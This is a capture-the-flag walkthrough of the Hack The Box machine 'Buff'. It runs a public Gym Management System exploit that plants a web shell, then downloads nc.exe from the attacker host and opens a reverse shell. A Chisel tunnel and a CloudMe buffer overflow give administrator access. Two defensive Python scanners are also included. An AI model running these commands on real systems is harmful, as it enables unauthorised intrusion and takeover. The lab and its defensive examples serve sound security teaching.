HTB Buff

$ nmap -A -T4 -p- 10.10.10.198 -Pn

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-31 16:52 CET
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 34.52% done; ETC: 16:55 (0:02:22 remaining)
Stats: 0:02:50 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 83.96% done; ETC: 16:55 (0:00:32 remaining)
Stats: 0:04:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.92% done; ETC: 16:56 (0:00:00 remaining)
Nmap scan report for 10.10.10.198
Host is up (0.058s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 262.44 seconds

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u http://10.10.10.198:8080 -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.198:8080
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/10/31 19:32:24 Starting gobuster
===============================================================
http://10.10.10.198:8080/img (Status: 301)
http://10.10.10.198:8080/profile (Status: 301)
http://10.10.10.198:8080/upload (Status: 301)
http://10.10.10.198:8080/license (Status: 200)
http://10.10.10.198:8080/include (Status: 301)
http://10.10.10.198:8080/licenses (Status: 403)
http://10.10.10.198:8080/Profile (Status: 301)
http://10.10.10.198:8080/LICENSE (Status: 200)
http://10.10.10.198:8080/att (Status: 301)
http://10.10.10.198:8080/%20 (Status: 403)
http://10.10.10.198:8080/IMG (Status: 301)
http://10.10.10.198:8080/License (Status: 200)
http://10.10.10.198:8080/ex (Status: 301)
http://10.10.10.198:8080/*checkout* (Status: 403)
http://10.10.10.198:8080/Img (Status: 301)
http://10.10.10.198:8080/Upload (Status: 301)
http://10.10.10.198:8080/boot (Status: 301)
http://10.10.10.198:8080/phpmyadmin (Status: 403)
http://10.10.10.198:8080/webalizer (Status: 403)
http://10.10.10.198:8080/*docroot* (Status: 403)
http://10.10.10.198:8080/* (Status: 403)
http://10.10.10.198:8080/con (Status: 403)
http://10.10.10.198:8080/Include (Status: 301)
http://10.10.10.198:8080/http%3A (Status: 403)
http://10.10.10.198:8080/**http%3a (Status: 403)
http://10.10.10.198:8080/Boot (Status: 301)
http://10.10.10.198:8080/aux (Status: 403)
http://10.10.10.198:8080/*http%3A (Status: 403)
http://10.10.10.198:8080/**http%3A (Status: 403)
http://10.10.10.198:8080/%C0 (Status: 403)
===============================================================
2020/10/31 20:03:00 Finished
===============================================================

Browsing to http://10.10.10.198:8080/ we find the home page.

It links to https://projectworlds.in, which lists a number of downloadable projects.

The one in use here is the Gym Management System: https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/

The whole project can be downloaded from that page, so the source can be reviewed offline.

$ searchsploit Gym Management System 1.0

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                        |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection                                                                                                                                                        | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass                                                                                                                                                     | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting                                                                                                                                               | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                                                                     | php/webapps/48506.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Using this exploit (https://www.exploit-db.com/exploits/48506):

$ python2.7 48506.py http://10.10.10.198:8080/

            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload> whoami

�PNG
▒
buff\shaun

C:\xampp\htdocs\gym\upload> dir

�PNG
▒
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

11/11/2020  14:17    <DIR>          .
11/11/2020  14:17    <DIR>          ..
11/11/2020  14:17                53 kamehameha.php
               1 File(s)             53 bytes
               2 Dir(s)   9,815,011,328 bytes free

C:\xampp\htdocs\gym\upload>

The exploit has uploaded a web shell (kamehameha.php in the upload directory) to the server. Note the PNG signature it prints before every reply: the uploaded file starts with an image header, followed by the PHP code.
From this point on we can also use it straight from the browser.

The URL can be adjusted to perform different actions; the command goes in the telepathy parameter:

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=<action>
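As an added defensive example (not code from the original post or from the Gym Management System project): a scanner that checks an upload directory for exactly this kind of file, a PNG signature followed by PHP code, a script extension where only images belong, or a call to a command-execution function. The directory, file names and file contents are constructed for the demo.

```python
"""Scan a web-upload directory for PHP code hidden behind a PNG header.
Added defensive example for this write-up, not code from the original post or the
Gym Management System project. The shell above prints a PNG signature before each
answer, i.e. the uploaded file is a PNG/PHP polyglot. All samples are constructed.
"""
import os
import re
import tempfile

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# PHP functions that hand a string to the OS shell or to the interpreter.
EXEC_CALL = re.compile(rb"\b(system|exec|shell_exec|passthru|popen|eval)\s*\(")
SCRIPT_EXT = {".php", ".phtml", ".php3", ".php5", ".phar"}


def classify(data, name):
    """Return the findings for one uploaded file (empty list means clean)."""
    findings = []
    has_php = PHP_TAG.search(data) is not None
    if os.path.splitext(name)[1].lower() in SCRIPT_EXT:
        findings.append("executable extension inside the upload directory")
    if has_php and data.startswith(PNG_MAGIC):
        findings.append("PNG signature followed by PHP code (polyglot)")
    elif has_php:
        findings.append("PHP code in a file that should be an image")
    if has_php and EXEC_CALL.search(data):
        findings.append("calls a command-execution function")
    return findings


def scan_upload_dir(directory):
    """Map each suspicious file name in `directory` to its findings."""
    report = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                hits = classify(fh.read(), name)
            if hits:
                report[name] = hits
    return report


def demo():
    """Write a constructed upload directory, scan it and return the report."""
    directory = tempfile.mkdtemp(prefix="gym-upload-")
    samples = {
        "member.png": PNG_MAGIC + b"\x00" * 32,                  # plain image stub
        "avatar.php": PNG_MAGIC + b'<?php /* constructed */ system("id"); ?>',
        "trainer.jpg": b"\xff\xd8\xff\xe0<?php echo 1; ?>",       # tag, no exec call
    }
    for name, data in samples.items():
        with open(os.path.join(directory, name), "wb") as fh:
            fh.write(data)
    return scan_upload_dir(directory)
```

Running the same scan as a scheduled job over the real upload directory, or rejecting any upload whose bytes contain a PHP open tag regardless of extension, closes the hole the exploit above relies on.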

Let's upgrade this minimal shell to a proper reverse shell. First we fetch nc.exe from a web server on our machine (10.10.14.5, port 8000):

C:\xampp\htdocs\gym\upload> curl http://10.10.14.5:8000/nc.exe --output nc.exe

�PNG
▒

C:\xampp\htdocs\gym\upload> dir

�PNG
▒
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

11/11/2020  15:05    <DIR>          .
11/11/2020  15:05    <DIR>          ..
11/11/2020  14:17                53 kamehameha.php
11/11/2020  15:05            59,392 nc.exe
               2 File(s)         59,445 bytes
               2 Dir(s)   9,811,681,280 bytes free

C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload> nc.exe -nv 10.10.14.5 9999 -e cmd.exe

$ nc -lvnp 9999

listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.198] 49807
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload>whoami

buff\shaun

C:\xampp\htdocs\gym\upload>cd c:/users
C:\Users>dir

Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of c:\Users

16/06/2020  19:52    <DIR>          .
16/06/2020  19:52    <DIR>          ..
20/07/2020  11:08    <DIR>          Administrator
16/06/2020  14:08    <DIR>          Public
16/06/2020  14:11    <DIR>          shaun
               0 File(s)              0 bytes
               5 Dir(s)   9,810,792,448 bytes free

C:\Users>cd shaun
C:\Users\shaun\Desktop>type user.txt

57d1XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Enumerating the processes on the system from a PowerShell session:

PS C:\Users\shaun\Downloads> get-process

 Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                             
 -------  ------    -----      -----     ------     --  -- -----------                                 
 431      24    18028       9348              6688   1 ApplicationFrameHost                         
 161      10     1936       1736              4360   1 browser_broker                               
 166      13    17112      16656              2896   0 CloudMe                                      
  40       5     4448       3232              3028   0 cmd                                          
  49       4     1936       2004       0.02   5412   0 cmd                                          
  81       6     3748       3652       6.25   6884   0 cmd                                         
 119       8     5376       3296       1.34   6112   0 conhost                                     
 140       9     5704      11052              7604   0 conhost                                     
 140       9     5652        544     226.83   8180   0 conhost                                     
 616      21     1800       2024               452   0 csrss                                       
 321      18     1616       1428               544   1 csrss                                       
 358      14     3008       3328              4712   1 ctfmon                                       
 242      13     3992       4836              3680   0 dllhost                                     
 187      11     2316       4116              6000   1 dllhost                                     
 665      33    26876      29104               388   1 dwm                                        
1751      64    25372      45516              2560   1 explorer                                      
  44      12    14004      17084               828   0 fontdrvhost                                  
  44      14     8028       6604               836   1 fontdrvhost                                 
 166      28     9604        156       3.25   4428   0 httpd                                       
 511      54    27212       4436   1,562.02   6764   0 httpd                                         
   0       0       56          8                 0   0 Idle                                         
 987      21     4544       7520               696   0 lsass                                         
   0       0      176      37936              1548   0 Memory Compression                           
 778      45    41704      27836              8988   1 Microsoft.Photos                             
 881      46    19932      16384              7016   1 MicrosoftEdge                               
 490      20     5916       4076              7868   1 MicrosoftEdgeCP                             
 389      17     5140       3468              7924   1 MicrosoftEdgeCP                             
 155      10     1932       3288              2988   1 MSASCuiL                                     
 206      13     2860       2808              2240   0 msdtc                                       
 711      72   183892     148804              2848   0 MsMpEng                                     
 166      15   210140       9724     404.91   2684   0 mysqld                                        
  89       8      968       7476      20.13   6432   0 nc                                           
 192      12     3844       4524              5596   0 NisSrv                                       
 559      38    45760      53420      18.98   6088   0 powershell                                     
   0      13      628       2596               104   0 Registry                                     
 381      18     5856      16980              3976   1 RuntimeBroker                               
 116       8     1576       1744              6056   1 RuntimeBroker                               
 425      21     6808      13264              6468   1 RuntimeBroker                               
 278      15     5316      13096              6696   1 RuntimeBroker                               
 141       8     1752       1696              7412   1 RuntimeBroker                               
 280      15     4968      10584              8860   1 RuntimeBroker                               
 716      42    21888      15212              6820   0 SearchIndexer                              
1044      70    68612      85804              6344   1 SearchUI                                     
 371      16     4276       8144              2792   0 SecurityHealthService                       
 587      10     4652       6428               676   0 services                                      
  65       5     2392       2748               320   0 SgrmBroker                                   
 876      35    22892      27352              5000   1 ShellExperienceHost                         
 580      18     6464      12424              4420   1 sihost                                        
  52       3      500        424               348   0 smss                                         
 413      21     5152       4840              2156   0 spoolsv                                     
 330      15     4168       8996               408   0 svchost                                      
  84       5      980        856               804   0 svchost                                 
 ...
 201      12     1752       2868              8720   0 svchost                                     
 122       7     2336       7212              9152   0 svchost                                    
 25   13      0      192         24                 4   0 System                                       
 765      36    14396        668              9128   1 SystemSettings                               
 273      28     5176       7484              4588   1 taskhostw                                   
 350      21     7776      14304              8716   1 taskhostw                                   
 170      12     3252       2748              2800   0 VGAuthService                               
 371      21     9348      10984              2828   0 vmtoolsd                                     
 231      18     3924       4288              7120   1 vmtoolsd                                     
 185      11     2216      11976              6728   0 wermgr                                        
  98       6     1160       1080              7240   0 Windows.WARP.JITService                     
 151      10     1292       1308               532   0 wininit                                     
 247      11     2404       2048               608   1 winlogon                                     
 510      36    15720        352              9140   1 WinStore.App                                 
 331      16    10844      15384              4028   0 WmiPrvSE                                 

PS C:\Users\shaun\Downloads>

Among the running processes we find something interesting: CloudMe, version 1.11.2.

CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software.

https://en.wikipedia.org/wiki/CloudMe

$ searchsploit cloudme

----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                             | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                                    | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                                    | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                                   | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)                            | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)                     | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                                        | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                                    | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)                           | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                                            | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)                         | windows_x86-64/remote/44784.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

CloudMe usually listens on TCP port 8888. On this box it is bound to 127.0.0.1 only (the nmap scan never showed it), so the port is not reachable from our machine directly.

We will use this exploit (https://www.exploit-db.com/exploits/48389), but first we need a reverse tunnel to reach the port.

We're going to use Chisel for this: the client on the target connects back to our Chisel server and asks it to forward port 8888 on our side to 127.0.0.1:8888 on the target.
https://github.com/jpillora/chisel

C:\xampp\htdocs\gym\upload>chisel.exe client 10.10.14.14:9000 R:8888:127.0.0.1:8888

chisel.exe client 10.10.14.14:9000 R:8888:127.0.0.1:8888
2020/11/22 10:00:25 client: Connecting to ws://10.10.14.14:9000
2020/11/22 10:00:25 client: Connected (Latency 190.6163ms)

$ ./chisel server -p 9000 --reverse

2020/11/22 10:55:09 server: Reverse tunnelling enabled
2020/11/22 10:55:09 server: Fingerprint zILwEVvwdCWQr98N2iDHUgd5VVRA/1hgw6Ml5umDuf0=
2020/11/22 10:55:09 server: Listening on http://0.0.0.0:9000
2020/11/22 11:00:26 server: session#1: tun: proxy#R:8888=>8888: Listening
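For the defender's side of this step, an added example (not code from the original post, Chisel or CloudMe): parse `netstat -ano` output and list the services bound only to loopback together with their owning process, which is the inventory that would have surfaced CloudMe on 127.0.0.1:8888 before anyone tunnelled to it. The netstat rows are constructed; the PID-to-image map follows the process listing above, and port 3306 for mysqld is an assumption.

```python
"""List loopback-only TCP listeners from Windows `netstat -ano` output.
Added defensive example for this write-up, not code from the original post, Chisel
or CloudMe. A service bound only to 127.0.0.1 is invisible to a port scan but fully
reachable once an attacker has a foothold and a tunnel. All sample input is
constructed; PIDs follow the process listing above, port 3306 is assumed.
"""
import re

# One "netstat -ano" row in LISTENING state: Proto  Local  Foreign  State  PID
LISTEN_ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")
LOOPBACK = {"127.0.0.1", "[::1]"}

SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       6764
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       2684
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2896
  TCP    [::1]:8888             [::]:0                 LISTENING       2896
  TCP    10.10.10.198:49807     10.10.14.5:9999        ESTABLISHED     6432
"""
# PID -> image name, as "tasklist" or Get-Process would report it (constructed).
SAMPLE_PROCESSES = {6764: "httpd.exe", 2684: "mysqld.exe",
                    2896: "CloudMe.exe", 6432: "nc.exe"}


def parse_listeners(netstat_text):
    """Return (local_address, port, pid) for every listening TCP socket."""
    listeners = []
    for line in netstat_text.splitlines():
        match = LISTEN_ROW.match(line)
        if match:
            addr, port, pid = match.groups()
            listeners.append((addr, int(port), int(pid)))
    return listeners


def loopback_only_services(netstat_text, processes):
    """Map port -> image name for ports bound to loopback addresses only.

    A port that is also bound to 0.0.0.0 or a real interface is already exposed
    to the network and shows up in an ordinary port scan, so it is skipped.
    """
    listeners = parse_listeners(netstat_text)
    exposed_ports = {port for addr, port, _ in listeners if addr not in LOOPBACK}
    services = {}
    for addr, port, pid in listeners:
        if addr in LOOPBACK and port not in exposed_ports:
            services[port] = processes.get(pid, f"unknown pid {pid}")
    return services
```

Each entry in the result is a candidate for the same question asked of CloudMe here: is the binary current, and does it need to run at all on a web server.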

$ python3 48389.py
$ nc -lvnp 9001

listening on [any] 9001 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.198] 49813
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

C:\Windows\system32>whoami

buff\administrator

C:\Windows\system32>cd c:\Users
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>type root.txt

937cXXXXXXXXXXXXXXXXXXXXXXXXXXXX
